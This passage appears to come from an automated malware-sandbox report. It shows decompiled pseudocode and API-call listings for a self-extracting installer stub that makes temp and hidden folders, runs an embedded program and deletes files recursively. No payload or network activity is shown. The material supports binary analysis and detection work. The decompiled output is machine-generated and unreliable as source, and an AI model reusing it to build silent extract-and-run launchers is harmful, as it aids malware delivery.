                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0xa39124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E00A36CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E00A3597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0xa38a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0xa38a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0xa39124 = E00A36285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0xa38a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E00A353A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0xa391e4;
                                                                        				E00A31781(0xa391e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0xa39a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E00A3658A(_t48, 0x104, 0xa31140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E00A3658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}





















                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A354C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3556F
                                                                          • Part of subcall function 00A353A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A353FB
                                                                          • Part of subcall function 00A353A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35402
                                                                          • Part of subcall function 00A353A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3541F
                                                                          • Part of subcall function 00A353A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3542B
                                                                          • Part of subcall function 00A353A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-3881341942
                                                                        • Opcode ID: 5140abd72b92b45aaf5792eac7e358f7f3daf2ffe0862036f0fc8c9f551cd057
                                                                        • Instruction ID: b74544b7ea813a004a76d9290fdb9c4aeb1c4d1134a3cf66d5741f9fcbfae6e9
                                                                        • Opcode Fuzzy Hash: 5140abd72b92b45aaf5792eac7e358f7f3daf2ffe0862036f0fc8c9f551cd057
                                                                        • Instruction Fuzzy Hash: 5631F571F00A146BCB149FBDAD459BFB7ABBB91340F04412AF442D7550DBB4DE028691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00A32390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xa38004; // 0xb6b6972c
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00A36CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00A31680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00A316B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00A31680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00A316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00A316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00A3658A( &_v280, 0x104, 0xa31140);
                                                                        								E00A32390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00A38A3A,00A311F4,00A38A3A,00000000,?,?), ref: 00A323F6
                                                                        • lstrcmpA.KERNEL32(?,00A311F8), ref: 00A32427
                                                                        • lstrcmpA.KERNEL32(?,00A311FC), ref: 00A3243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A32495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00A324A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A324AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00A324BE
                                                                        • RemoveDirectoryA.KERNELBASE(00A38A3A), ref: 00A324C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: 26dce44e717861f701e8936492a21d5c66e60d312968179231da111c73442e7a
                                                                        • Instruction ID: 28679144a012c0831553f048bc3d1ddfed6dd8d00131cc1bc636db099ff5c1ce
                                                                        • Opcode Fuzzy Hash: 26dce44e717861f701e8936492a21d5c66e60d312968179231da111c73442e7a
                                                                        • Instruction Fuzzy Hash: 1E318731604750ABC320DBA4DD8ABEBB3ECAFD5305F044A2DB59586190EB74D94DC752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 a33fef-a34010 632 a34016-a3403b CreateProcessA 631->632 633 a3410a-a3411a call a36ce0 631->633 634 a34041-a3406e WaitForSingleObject GetExitCodeProcess 632->634 635 a340c4-a34101 call a36285 GetLastError FormatMessageA call a344b9 632->635 638 a34091 call a3411b 634->638 639 a34070-a34077 634->639 649 a34106 635->649 646 a34096-a340b8 CloseHandle * 2 638->646 639->638 642 a34079-a3407b 639->642 642->638 645 a3407d-a34089 642->645 645->638 650 a3408b 645->650 647 a340ba-a340c0 646->647 648 a34108 646->648 647->648 651 a340c2 647->651 648->633 649->648 650->638 651->649
                                                                        C-Code - Quality: 84%
                                                                        			E00A33FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00A36CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xa39124 = E00A36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00A344B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xa38a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xa39a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xa39a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00A3411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xa39a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}
                                                                        0x00a34089
                                                                        0x00a3408b
                                                                        0x00a3408b
                                                                        0x00a34089
                                                                        0x00a34077
                                                                        0x00a34091
                                                                        0x00a3409c
                                                                        0x00a340a8
                                                                        0x00a340b8
                                                                        0x00000000
                                                                        0x00a340c2
                                                                        0x00000000
                                                                        0x00a340c2

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE ref: 00A34033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A34049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00A3405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00A3409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00A340A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A340DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A340E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: 773cfc288ea663a5ba700bc5e80a8b36a9b45e4e4481ef325cc7006420a1c942
                                                                        • Instruction ID: 23adf61d11c08c3d02366936661e338bef22f351ecda3ccc84a83ab0a82d5132
                                                                        • Opcode Fuzzy Hash: 773cfc288ea663a5ba700bc5e80a8b36a9b45e4e4481ef325cc7006420a1c942
                                                                        • Instruction Fuzzy Hash: 3731D731640218BBEB20DFA5DC4DFABB77CEBA9700F1042A9F545D21A1C6745D86CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00A32BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xa3a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xa39124 = 0;
                                                                        				if(E00A32CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00A32F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00A352B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xa38a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xa39a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00A31F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xa38588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xa39124; // 0x0
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A32C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00A36BB0,00A30000,00000000,00000002,0000000A), ref: 00A32C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: 7605bf8c6f1636f03b6d3dbfb9eefce0dadd8d0287bee2ee24a68bcfc1b2b145
                                                                        • Instruction ID: 35af43d065ab8ab4b147f6ff7084025614a9a4b7624724cecbd619210c69e64a
                                                                        • Opcode Fuzzy Hash: 7605bf8c6f1636f03b6d3dbfb9eefce0dadd8d0287bee2ee24a68bcfc1b2b145
                                                                        • Instruction Fuzzy Hash: 0311E1316003156BD720ABF6AD89B6F3769AB88391F141125F981E3290DB71DC0387A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A36F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00A36EF0); // executed
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A36F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 1a8ca0753ec914fcd491db075744e5cbe87bab8f911a34967c77933cf34f5193
                                                                        • Instruction ID: dfafef1b37ed61b3c38199628720144b20e8e4c27a6d93666c0d13bedf9e16e8
                                                                        • Opcode Fuzzy Hash: 1a8ca0753ec914fcd491db075744e5cbe87bab8f911a34967c77933cf34f5193
                                                                        • Instruction Fuzzy Hash: A59002642511106796105BB09D1D41575916A5D603F929961B051C8494DB6140455512
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph
                                                                        [Control-flow graph of the function starting at a355a0; legend: Executed / Not Executed. Graph not reproduced.]
                                                                        C-Code - Quality: 92%
                                                                        			E00A355A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E00A3468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00A3468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xa39a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xa38b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xa38a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00A36517(_t82, 0x7d2, 0, E00A33210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xa39a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xa391e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xa391e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00A31781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00A36952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E00A3597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00A32630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00A3658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xa391e4;
                                                                        																					E00A31781(0xa391e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00A35467(0xa391e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00A32630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00A3597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00A35467(0xa391e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xa391e4;
                                                                        											_t70 = E00A32630(0, 0xa391e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xa391e4;
                                                                        												_t71 = E00A35467(0xa391e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00A3597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xa38b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00A35467(0xa38b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00A344B9(0, 0x4be, 0, 0, 0x10, 0);
